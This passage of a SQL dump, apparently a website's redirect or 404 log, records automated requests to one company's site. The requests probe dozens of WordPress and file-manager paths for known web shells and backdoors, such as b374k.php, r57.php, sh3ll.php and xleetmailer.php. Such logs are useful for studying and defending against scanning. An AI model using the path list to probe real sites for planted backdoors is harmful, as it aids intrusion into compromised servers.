00:00:00',301),(53960,'http://3s-technologies.com.tr/en/wp-includes/certificates/indexx.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:39:07','0000-00-00 00:00:00',301),(53961,'http://3s-technologies.com.tr/en/wp-includes/customize/indexx.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:08','0000-00-00 00:00:00',301),(53962,'http://3s-technologies.com.tr/en/wp-includes/pomo/indexx.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:39:09','0000-00-00 00:00:00',301),(53963,'http://3s-technologies.com.tr/en/wp-includes/rest-api/indexx.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:39:10','0000-00-00 00:00:00',301),(53964,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/indexx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:39:11','0000-00-00 00:00:00',301),(53965,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/indexx.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:12','0000-00-00 00:00:00',301),(53966,'http://3s-technologies.com.tr/en/.well-known/indexx.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:39:13','0000-00-00 00:00:00',301),(53967,'http://3s-technologies.com.tr/en/index/indexx.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:14','0000-00-00 00:00:00',301),(53968,'http://3s-technologies.com.tr/en/about/indexx.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:15','0000-00-00 00:00:00',301),(53969,'http://3s-technologies.com.tr/en/as/indexx.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:15','0000-00-00 00:00:00',301),(53970,'http://3s-technologies.com.tr/en/file/indexx.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:16','0000-00-00 00:00:00',301),(53971,'http://3s-technologies.com.tr/en/chosen/indexx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:39:17','0000-00-00 00:00:00',301),(53972,'http://3s-technologies.com.tr/en/css/indexx.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:39:18','0000-00-00 00:00:00',301),(53973,'http://3s-technologies.com.tr/en/doc/indexx.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:19','0000-00-00 00:00:00',301),(53974,'http://3s-technologies.com.tr/en/admin/indexx.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:20','0000-00-00 00:00:00',301),(53975,'http://3s-technologies.com.tr/en/mah/indexx.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:39:21','0000-00-00 00:00:00',301),(53976,'http://3s-technologies.com.tr/en/plugins/indexx.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:22','0000-00-00 00:00:00',301),(53977,'http://3s-technologies.com.tr/en/client/sinchro-advisory/indexx.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:22','0000-00-00 00:00:00',301),(53978,'http://3s-technologies.com.tr/en/indeex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:23','0000-00-00 00:00:00',301),(53979,'http://3s-technologies.com.tr/en/wp-admin/includes/upl.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:39:25','0000-00-00 00:00:00',301),(53980,'http://3s-technologies.com.tr/en/.well-known/upl.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:28','0000-00-00 00:00:00',301),(53981,'http://3s-technologies.com.tr/en/wp-content/upl.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:30','0000-00-00 00:00:00',301),(53982,'http://3s-technologies.com.tr/en/wp-admin/upl.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:31','0000-00-00 00:00:00',301),(53983,'http://3s-technologies.com.tr/en/wp-includes/upl.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:32','0000-00-00 00:00:00',301),(53984,'http://3s-technologies.com.tr/en/wp-admin/includes/nav.php',NULL,'https://www.bing.com/','',8,0,'2025-12-20 05:39:33','0000-00-00 00:00:00',301),(53985,'http://3s-technologies.com.tr/en/wp-admin/images/nav.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:34','0000-00-00 00:00:00',301),(53986,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/nav.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:39:36','0000-00-00 00:00:00',301),(53987,'http://3s-technologies.com.tr/en/wp-admin/js/nav.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:36','0000-00-00 00:00:00',301),(53988,'http://3s-technologies.com.tr/en/wp-admin/maint/nav.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:37','0000-00-00 00:00:00',301),(53989,'http://3s-technologies.com.tr/en/wp-admin/network/nav.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:39:38','0000-00-00 00:00:00',301),(53990,'http://3s-technologies.com.tr/en/wp-admin/user/nav.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:39:39','0000-00-00 00:00:00',301),(53991,'http://3s-technologies.com.tr/en/wp-content/nav.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:39:40','0000-00-00 00:00:00',301),(53992,'http://3s-technologies.com.tr/en/wp-content/uploads/nav.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:41','0000-00-00 00:00:00',301),(53993,'http://3s-technologies.com.tr/en/wp-content/plugins/nav.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:42','0000-00-00 00:00:00',301),(53994,'http://3s-technologies.com.tr/en/wp-content/languages/nav.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:43','0000-00-00 00:00:00',301),(53995,'http://3s-technologies.com.tr/en/wp-content/languages/themes/nav.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:44','0000-00-00 00:00:00',301),(53996,'http://3s-technologies.com.tr/en/wp-includes/simplepie/nav.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:45','0000-00-00 00:00:00',301),(53997,'http://3s-technologies.com.tr/en/wp-includes/certificates/nav.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:39:46','0000-00-00 00:00:00',301),(53998,'http://3s-technologies.com.tr/en/wp-includes/customize/nav.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:47','0000-00-00 00:00:00',301),(53999,'http://3s-technologies.com.tr/en/wp-includes/pomo/nav.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:48','0000-00-00 00:00:00',301),(54000,'http://3s-technologies.com.tr/en/wp-includes/rest-api/nav.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:48','0000-00-00 00:00:00',301),(54001,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/nav.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:39:49','0000-00-00 00:00:00',301),(54002,'http://3s-technologies.com.tr/en/index/nav.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:39:50','0000-00-00 00:00:00',301),(54003,'http://3s-technologies.com.tr/en/about/nav.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:39:51','0000-00-00 00:00:00',301),(54004,'http://3s-technologies.com.tr/en/as/nav.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:52','0000-00-00 00:00:00',301),(54005,'http://3s-technologies.com.tr/en/file/nav.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:53','0000-00-00 00:00:00',301),(54006,'http://3s-technologies.com.tr/en/chosen/nav.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:54','0000-00-00 00:00:00',301),(54007,'http://3s-technologies.com.tr/en/css/nav.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:55','0000-00-00 00:00:00',301),(54008,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/nav.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:39:56','0000-00-00 00:00:00',301),(54009,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/nav.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:56','0000-00-00 00:00:00',301),(54010,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/nav.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:39:57','0000-00-00 00:00:00',301),(54011,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/nav.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:39:58','0000-00-00 00:00:00',301),(54012,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/nav.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:39:59','0000-00-00 00:00:00',301),(54013,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/nav.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:40:00','0000-00-00 00:00:00',301),(54014,'http://3s-technologies.com.tr/en/ajaxfilemanager/nav.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:40:01','0000-00-00 00:00:00',301),(54015,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/nav.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:40:02','0000-00-00 00:00:00',301),(54016,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpresscore/admin.php?taf',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:40:03','0000-00-00 00:00:00',301),(54017,'http://3s-technologies.com.tr/en/wp-pano.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:40:04','0000-00-00 00:00:00',301),(54018,'http://3s-technologies.com.tr/en/wp-admin/includes/404.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:40:07','0000-00-00 00:00:00',301),(54019,'http://3s-technologies.com.tr/en/wp-admin/maint/404.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:40:08','0000-00-00 00:00:00',301),(54020,'http://3s-technologies.com.tr/en/wp-admin/css/404.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:40:09','0000-00-00 00:00:00',301),(54021,'http://3s-technologies.com.tr/en/.well-known/fw.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:40:14','0000-00-00 00:00:00',301),(54022,'http://3s-technologies.com.tr/en/.well-known/a.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:40:15','0000-00-00 00:00:00',301),(54023,'http://3s-technologies.com.tr/en/.well-known/404.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:40:16','0000-00-00 00:00:00',301),(54024,'http://3s-technologies.com.tr/en/.well-known/x.php',NULL,'https://duckduckgo.com/','',6,0,'2025-12-20 05:40:16','0000-00-00 00:00:00',301),(54025,'http://3s-technologies.com.tr/en/.well-known/am.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:40:17','0000-00-00 00:00:00',301),(54026,'http://3s-technologies.com.tr/en/.well-known/maro.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:40:18','0000-00-00 00:00:00',301),(54027,'http://3s-technologies.com.tr/en/wp-admin/am.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:40:27','0000-00-00 00:00:00',301),(54028,'http://3s-technologies.com.tr/en/wp-admin/maint/am.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:40:27','0000-00-00 00:00:00',301),(54029,'http://3s-technologies.com.tr/en/wp-content/am.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:40:28','0000-00-00 00:00:00',301),(54030,'http://3s-technologies.com.tr/en/wp-admin/includes/am.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:40:30','0000-00-00 00:00:00',301),(54031,'http://3s-technologies.com.tr/en/wp-admin/includes/maro.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:40:32','0000-00-00 00:00:00',301),(54032,'http://3s-technologies.com.tr/en/wp-admin/shadowx.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:40:36','0000-00-00 00:00:00',301),(54033,'http://3s-technologies.com.tr/en/wp-includes/shadowx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:40:38','0000-00-00 00:00:00',301),(54034,'http://3s-technologies.com.tr/en/sh3ll.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:40:39','0000-00-00 00:00:00',301),(54035,'http://3s-technologies.com.tr/en/alfav4.1-tesla.php',NULL,'https://www.google.fr/','',10,0,'2025-12-20 05:40:40','0000-00-00 00:00:00',301),(54036,'http://3s-technologies.com.tr/en/xleetmailer.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:40:40','0000-00-00 00:00:00',301),(54037,'http://3s-technologies.com.tr/en/raw.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:40:42','0000-00-00 00:00:00',301),(54038,'http://3s-technologies.com.tr/en/wp-includes/shell.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:40:52','0000-00-00 00:00:00',301),(54039,'http://3s-technologies.com.tr/en/wp-includes/fox.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:40:54','0000-00-00 00:00:00',301),(54040,'http://3s-technologies.com.tr/en/wp-includes/gelay.php',NULL,'https://www.google.com/','',10,0,'2025-12-20 05:40:56','0000-00-00 00:00:00',301),(54041,'http://3s-technologies.com.tr/en/wp-content/45.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:40:58','0000-00-00 00:00:00',301),(54042,'http://3s-technologies.com.tr/en/wp-content/gelay.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:41:00','0000-00-00 00:00:00',301),(54043,'http://3s-technologies.com.tr/en/wp-admin/mini.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:41:01','0000-00-00 00:00:00',301),(54044,'http://3s-technologies.com.tr/en/wp-admin/fox.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:41:02','0000-00-00 00:00:00',301),(54045,'http://3s-technologies.com.tr/en/wp-admin/45.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:02','0000-00-00 00:00:00',301),(54046,'http://3s-technologies.com.tr/en/wp-admin/gelay.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:41:03','0000-00-00 00:00:00',301),(54047,'http://3s-technologies.com.tr/en/wp-admin/b374k.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:41:04','0000-00-00 00:00:00',301),(54048,'http://3s-technologies.com.tr/en/wp-admin/r57.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:05','0000-00-00 00:00:00',301),(54049,'http://3s-technologies.com.tr/en/matamu.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:06','0000-00-00 00:00:00',301),(54050,'http://3s-technologies.com.tr/en/aci.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:07','0000-00-00 00:00:00',301),(54051,'http://3s-technologies.com.tr/en/shv3n0m.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:09','0000-00-00 00:00:00',301),(54052,'http://3s-technologies.com.tr/en/maro.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:10','0000-00-00 00:00:00',301),(54053,'http://3s-technologies.com.tr/en/wp-includes/maro.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:41:11','0000-00-00 00:00:00',301),(54054,'http://3s-technologies.com.tr/en/php_shell.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:41:13','0000-00-00 00:00:00',301),(54055,'http://3s-technologies.com.tr/en/l28.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:41:14','0000-00-00 00:00:00',301),(54056,'http://3s-technologies.com.tr/en/888.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:41:15','0000-00-00 00:00:00',301),(54057,'http://3s-technologies.com.tr/en/wp-admin/maint/poster.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:16','0000-00-00 00:00:00',301),(54058,'http://3s-technologies.com.tr/en/wp-admin/maint/langar.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:17','0000-00-00 00:00:00',301),(54059,'http://3s-technologies.com.tr/en/wp-content/byp.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:41:20','0000-00-00 00:00:00',301),(54060,'http://3s-technologies.com.tr/en/wp-admin/byp.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:41:21','0000-00-00 00:00:00',301),(54061,'http://3s-technologies.com.tr/en/wp-admin/includes/byp.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:41:21','0000-00-00 00:00:00',301),(54062,'http://3s-technologies.com.tr/en/wp-content/themes/byp.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:41:22','0000-00-00 00:00:00',301),(54063,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/byp.php?p=',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:41:23','0000-00-00 00:00:00',301),(54064,'http://3s-technologies.com.tr/en/wp-admin/css/colors/byp.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:24','0000-00-00 00:00:00',301),(54065,'http://3s-technologies.com.tr/en/wp-admin/css/byp.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:41:25','0000-00-00 00:00:00',301),(54066,'http://3s-technologies.com.tr/en/wp-admin/maint/byp.php?p=',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:41:26','0000-00-00 00:00:00',301),(54067,'http://3s-technologies.com.tr/en/.well-known/byp.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:41:27','0000-00-00 00:00:00',301),(54068,'http://3s-technologies.com.tr/en/images/byp.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:41:28','0000-00-00 00:00:00',301),(54069,'http://3s-technologies.com.tr/en/wp-includes/css/byp.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:30','0000-00-00 00:00:00',301),(54070,'http://3s-technologies.com.tr/en/wp-content/wp_configs.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:31','0000-00-00 00:00:00',301),(54071,'http://3s-technologies.com.tr/en/wp-admin/wp_configs.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:41:32','0000-00-00 00:00:00',301),(54072,'http://3s-technologies.com.tr/en/wp-admin/includes/wp_configs.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:41:32','0000-00-00 00:00:00',301),(54073,'http://3s-technologies.com.tr/en/wp-content/themes/wp_configs.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:33','0000-00-00 00:00:00',301),(54074,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/wp_configs.php?p=',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:41:34','0000-00-00 00:00:00',301),(54075,'http://3s-technologies.com.tr/en/wp-content/uploads/showupload.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:41:36','0000-00-00 00:00:00',301),(54076,'http://3s-technologies.com.tr/en/wp-ssl.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:41:37','0000-00-00 00:00:00',301),(54077,'http://3s-technologies.com.tr/en/crack_self_restore.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:39','0000-00-00 00:00:00',301),(54078,'http://3s-technologies.com.tr/en/files/file_uploader.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:41:39','0000-00-00 00:00:00',301),(54079,'http://3s-technologies.com.tr/en/wp-includes/crack_self_restore.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:41:40','0000-00-00 00:00:00',301),(54080,'http://3s-technologies.com.tr/en/cyborg_tmp.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:41:41','0000-00-00 00:00:00',301),(54081,'http://3s-technologies.com.tr/en/wp-admin/images/wp-term.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:41:42','0000-00-00 00:00:00',301),(54082,'http://3s-technologies.com.tr/en/wp-admin/includes/wp-term.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:41:43','0000-00-00 00:00:00',301),(54083,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-term.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:41:44','0000-00-00 00:00:00',301),(54084,'http://3s-technologies.com.tr/en/wp-admin/js/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:45','0000-00-00 00:00:00',301),(54085,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:46','0000-00-00 00:00:00',301),(54086,'http://3s-technologies.com.tr/en/wp-admin/network/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:47','0000-00-00 00:00:00',301),(54087,'http://3s-technologies.com.tr/en/wp-admin/user/wp-term.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:41:48','0000-00-00 00:00:00',301),(54088,'http://3s-technologies.com.tr/en/wp-content/wp-term.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:41:48','0000-00-00 00:00:00',301),(54089,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:49','0000-00-00 00:00:00',301),(54090,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:50','0000-00-00 00:00:00',301),(54091,'http://3s-technologies.com.tr/en/wp-content/languages/wp-term.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:41:51','0000-00-00 00:00:00',301),(54092,'http://3s-technologies.com.tr/en/wp-content/languages/themes/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:52','0000-00-00 00:00:00',301),(54093,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:53','0000-00-00 00:00:00',301),(54094,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp-term.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:41:54','0000-00-00 00:00:00',301),(54095,'http://3s-technologies.com.tr/en/wp-includes/customize/wp-term.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:41:55','0000-00-00 00:00:00',301),(54096,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp-term.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:41:56','0000-00-00 00:00:00',301),(54097,'http://3s-technologies.com.tr/en/wp-includes/rest-api/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:41:57','0000-00-00 00:00:00',301),(54098,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp-term.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:41:58','0000-00-00 00:00:00',301),(54099,'http://3s-technologies.com.tr/en/index/wp-term.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:41:59','0000-00-00 00:00:00',301),(54100,'http://3s-technologies.com.tr/en/about/wp-term.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:42:00','0000-00-00 00:00:00',301),(54101,'http://3s-technologies.com.tr/en/as/wp-term.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:00','0000-00-00 00:00:00',301),(54102,'http://3s-technologies.com.tr/en/file/wp-term.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:01','0000-00-00 00:00:00',301),(54103,'http://3s-technologies.com.tr/en/chosen/wp-term.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:02','0000-00-00 00:00:00',301),(54104,'http://3s-technologies.com.tr/en/css/wp-term.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:03','0000-00-00 00:00:00',301),(54105,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/wp-term.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:42:04','0000-00-00 00:00:00',301),(54106,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/wp-term.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:05','0000-00-00 00:00:00',301),(54107,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/wp-term.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:06','0000-00-00 00:00:00',301),(54108,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/wp-term.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:42:06','0000-00-00 00:00:00',301),(54109,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/wp-term.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:07','0000-00-00 00:00:00',301),(54110,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/wp-term.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:08','0000-00-00 00:00:00',301),(54111,'http://3s-technologies.com.tr/en/ajaxfilemanager/wp-term.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:42:09','0000-00-00 00:00:00',301),(54112,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/wp-term.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:10','0000-00-00 00:00:00',301),(54113,'http://3s-technologies.com.tr/en/wp-checkbex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:11','0000-00-00 00:00:00',301),(54114,'http://3s-technologies.com.tr/en/nowpf.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:12','0000-00-00 00:00:00',301),(54115,'http://3s-technologies.com.tr/en/nowp.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:13','0000-00-00 00:00:00',301),(54116,'http://3s-technologies.com.tr/en/cawpf.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:13','0000-00-00 00:00:00',301),(54117,'http://3s-technologies.com.tr/en/cangma.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:14','0000-00-00 00:00:00',301),(54118,'http://3s-technologies.com.tr/en/jiema.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:15','0000-00-00 00:00:00',301),(54119,'http://3s-technologies.com.tr/en/wp-content/crack_self_restore.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:42:16','0000-00-00 00:00:00',301),(54120,'http://3s-technologies.com.tr/en/wp-admin/crack_self_restore.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:42:17','0000-00-00 00:00:00',301),(54121,'http://3s-technologies.com.tr/en/wp-admin/includes/crack_self_restore.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:42:18','0000-00-00 00:00:00',301),(54122,'http://3s-technologies.com.tr/en/wp-content/themes/crack_self_restore.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:42:19','0000-00-00 00:00:00',301),(54123,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/crack_self_restore.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:19','0000-00-00 00:00:00',301),(54124,'http://3s-technologies.com.tr/en/wp-admin/css/colors/crack_self_restore.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:20','0000-00-00 00:00:00',301),(54125,'http://3s-technologies.com.tr/en/wp-admin/css/crack_self_restore.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:42:21','0000-00-00 00:00:00',301),(54126,'http://3s-technologies.com.tr/en/wp-admin/maint/crack_self_restore.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:22','0000-00-00 00:00:00',301),(54127,'http://3s-technologies.com.tr/en/.well-known/crack_self_restore.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:42:23','0000-00-00 00:00:00',301),(54128,'http://3s-technologies.com.tr/en/images/crack_self_restore.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:42:24','0000-00-00 00:00:00',301),(54129,'http://3s-technologies.com.tr/en/wp-includes/css/crack_self_restore.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:25','0000-00-00 00:00:00',301),(54130,'http://3s-technologies.com.tr/en/assets/images/xl2024.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:25','0000-00-00 00:00:00',301),(54131,'http://3s-technologies.com.tr/en/ajax/xl2024.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:42:26','0000-00-00 00:00:00',301),(54132,'http://3s-technologies.com.tr/en/xl2024.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:27','0000-00-00 00:00:00',301),(54133,'http://3s-technologies.com.tr/en/xl2025.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:42:28','0000-00-00 00:00:00',301),(54134,'http://3s-technologies.com.tr/en/wp-content/themes/jobok/en.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:29','0000-00-00 00:00:00',301),(54135,'http://3s-technologies.com.tr/en/wp-includes/css/kses.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:42:30','0000-00-00 00:00:00',301),(54136,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-act.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:30','0000-00-00 